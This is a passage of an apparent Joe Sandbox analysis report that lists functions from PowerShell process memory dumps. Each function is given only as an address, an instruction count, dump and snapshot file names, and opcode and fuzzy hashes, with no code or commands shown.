                                                        • API String ID:
                                                        • Opcode ID: 4cf72dca19dab029adceb735beddf9526983410a64f077846a35d49635e5b8cf
                                                        • Instruction ID: c354da429144f30bfa5ba00bf4963f466e0e35eed808439f5e4fabc173123cba
                                                        • Opcode Fuzzy Hash: 4cf72dca19dab029adceb735beddf9526983410a64f077846a35d49635e5b8cf
                                                        • Instruction Fuzzy Hash: 5DF049749053445FD765EB74D0987AA7FE5EB05300F1044AED48BC7291CB396845CB50
                                                        Function 07AD4D3C Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18848dd7151512f24a4ae3d4af824273da9db49f90fc60203998e7e4060578f6
                                                        • Instruction ID: e572f018376665f5c946c59e249e633d4249c4a2daa855e3402ef4290c44b3e2
                                                        • Opcode Fuzzy Hash: 18848dd7151512f24a4ae3d4af824273da9db49f90fc60203998e7e4060578f6
                                                        • Instruction Fuzzy Hash: 09F0377010F3C28FC7528B64C8609A0BF32AF87620B1A82DBD4A5CB2E3D6368C55C752
                                                        Function 0928D33A Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61f9c6d24807b3bafcee0056ffcbc43faed270dc70b48014bd50c43e3b91f18b
                                                        • Instruction ID: 519704f4a6cb0163606c33cd6475988cb98f22f3b961888187d94044dd246149
                                                        • Opcode Fuzzy Hash: 61f9c6d24807b3bafcee0056ffcbc43faed270dc70b48014bd50c43e3b91f18b
                                                        • Instruction Fuzzy Hash: 28F01D31A00509AFCB05DFC8D9408EDF776FF88320B24C159E658A36A0C7329D62DB91
                                                        Function 04FBDF58 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ee671bb383387944b4f5a24b97745ce9c5e22f6b5548b15d4d61c74545d7c18
                                                        • Instruction ID: 4483137a914c2082d437d656d3c10ab0f33ebb2402b9cf76436fcc2f2e9c9689
                                                        • Opcode Fuzzy Hash: 3ee671bb383387944b4f5a24b97745ce9c5e22f6b5548b15d4d61c74545d7c18
                                                        • Instruction Fuzzy Hash: 92E0D821B0E3924F971661BA88406F97FD64DC30B535E01AAD885CB157D8888C0747F3
                                                        Function 04FBD788 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cfd7ef134f1ba8fa967eeb63a0f60ce3b720a2a630c8fac843a74be20a1946b
                                                        • Instruction ID: b66155177e45d37fdcfae497d0ec95029ad324a1f74ffe30ddb05119ebcc9ccd
                                                        • Opcode Fuzzy Hash: 6cfd7ef134f1ba8fa967eeb63a0f60ce3b720a2a630c8fac843a74be20a1946b
                                                        • Instruction Fuzzy Hash: B5F0A03830A2944FDB0A3778A42C5AE7F32DFC56A9F04416ED44687692CF68080687A6
                                                        Function 04FBDB80 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2c985192208252d45e51602fa6ea31dc0bbaa7f86326dd622d3496aeb3e2631
                                                        • Instruction ID: 163902d153f4ae126b01211f1807d8dd8c1dcf6bf7ae248ef12a9d4de8f07ff4
                                                        • Opcode Fuzzy Hash: b2c985192208252d45e51602fa6ea31dc0bbaa7f86326dd622d3496aeb3e2631
                                                        • Instruction Fuzzy Hash: 56F06D70A003084FD7A4AFB9D09839A7BE9FB44351F10443DE54EC3380DB39A8408B90
                                                        Function 04FBD798 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bc52d7c493f15ef2f62b03b9fccad9d1fa2bc672a69feec486cf99647f932ee
                                                        • Instruction ID: 220c5290c64756a300e443a60b487431eb9699ba1c6d4e12d708bc5a820762aa
                                                        • Opcode Fuzzy Hash: 8bc52d7c493f15ef2f62b03b9fccad9d1fa2bc672a69feec486cf99647f932ee
                                                        • Instruction Fuzzy Hash: 09E0803530551457DF093775A45C1DE7666DBC57A5F00412DE50583341CF79590187D7
                                                        Function 04FBCB7C Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e4371f5ad4c14395a2954f23f2ab30f5c62765ef682ac1707caecca7be7c1a2
                                                        • Instruction ID: 4ea0bda6080807aaf44cab213dae4c24446128173c9c7d149ff02b9c0ccc7cc5
                                                        • Opcode Fuzzy Hash: 8e4371f5ad4c14395a2954f23f2ab30f5c62765ef682ac1707caecca7be7c1a2
                                                        • Instruction Fuzzy Hash: 2BE0266330C0908FD302137668940E97F10E7E768770480AFC087CA192E6C9651393A1
                                                        Function 04FBF6E0 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d586ec5a8ad6a677eedf047589b08068abbfc25da82fe3a59aadac58c56eff0
                                                        • Instruction ID: 8bd43c3bae2137108b5384c4df5acf8c924cdd3c3cb857e4f9468c8080ef234c
                                                        • Opcode Fuzzy Hash: 5d586ec5a8ad6a677eedf047589b08068abbfc25da82fe3a59aadac58c56eff0
                                                        • Instruction Fuzzy Hash: FDE0EDB1D062469F8B41DFADC8455A9FFF0EA4A225B1486ABC809DA202E63255118FA1
                                                        Function 04FBDF68 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 943b967d7e7f075571c86d46840b7dd1d20830d7a644d50ab1c7fb887bc8b98d
                                                        • Instruction ID: b57750022969d61925ef333ae991cfca9095c55449768020bddfa9d545f08f57
                                                        • Opcode Fuzzy Hash: 943b967d7e7f075571c86d46840b7dd1d20830d7a644d50ab1c7fb887bc8b98d
                                                        • Instruction Fuzzy Hash: E5D09E16B042265B165875BB5D107FEB1CF8EC74B978D0136AA89D7246ED89EC1303F3
                                                        Function 04FBD150 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3df801804ad7a35605cdc9c95189118706349c0cdcae5b64e077fd9895c60bb7
                                                        • Instruction ID: b8ba5db4080311b64a1c346462d31e07ec49e271022af85f35e32c71bd615014
                                                        • Opcode Fuzzy Hash: 3df801804ad7a35605cdc9c95189118706349c0cdcae5b64e077fd9895c60bb7
                                                        • Instruction Fuzzy Hash: 3CE01A319051498BC709FF74D8AA8BD7F38EF11309B50009ED943525E2DF72255BCB82
                                                        Function 04FBD620 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c143fde6600070cf01f6ff9f006f0286769a7302778ac69c28b7632a9e5ba96d
                                                        • Instruction ID: c4e3b508ebb07225f92555626d8b59cd598b4c32663bebb037d4ecf7688acde9
                                                        • Opcode Fuzzy Hash: c143fde6600070cf01f6ff9f006f0286769a7302778ac69c28b7632a9e5ba96d
                                                        • Instruction Fuzzy Hash: 5EE0DF74E0410A8BDB08DF74D8964FEBFB0FF86220B0043A9DD99827A5EA311413CB82
                                                        Function 04FBF6F0 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                        • Instruction ID: ccd9a2d8f2bf0a356782f34f2b4a18b83a74f3149151e75710fe29cf07c2d098
                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                        • Instruction Fuzzy Hash: 8BD06275D042099F8780DFADC94156DFBF4EB49200F6085AA8919D7301F73156129BD1
                                                        Function 04FBD160 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f167924608af5c8a4a9d3ecf000511e550480a90ca18431f923785ea961d1c9
                                                        • Instruction ID: ab51fbbe650ed23e66335bb20a9c47be822babc0e124bc38adcb0990c4a6645c
                                                        • Opcode Fuzzy Hash: 6f167924608af5c8a4a9d3ecf000511e550480a90ca18431f923785ea961d1c9
                                                        • Instruction Fuzzy Hash: 11D0673190510E8BCB08BBB5E89A4BDBB38EB10205F4001ADD94752692EB202A5ACBC6

                                                        Non-executed Functions

                                                        Function 04ACD6F8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a794b11f2d17563a9aa0a92f5c25436ea00ccf29dbafdac9da1af2e6e8ce2552
                                                        • Instruction ID: 2649180b5907a46229509a7f2fd762f0373ab1fb1ce39f5e94d7d957f1386439
                                                        • Opcode Fuzzy Hash: a794b11f2d17563a9aa0a92f5c25436ea00ccf29dbafdac9da1af2e6e8ce2552
                                                        • Instruction Fuzzy Hash: 8C2122B2684240EFDB45DF14D9C4F26BFA5FB88324F24857DE8091B20AC336E456DBA1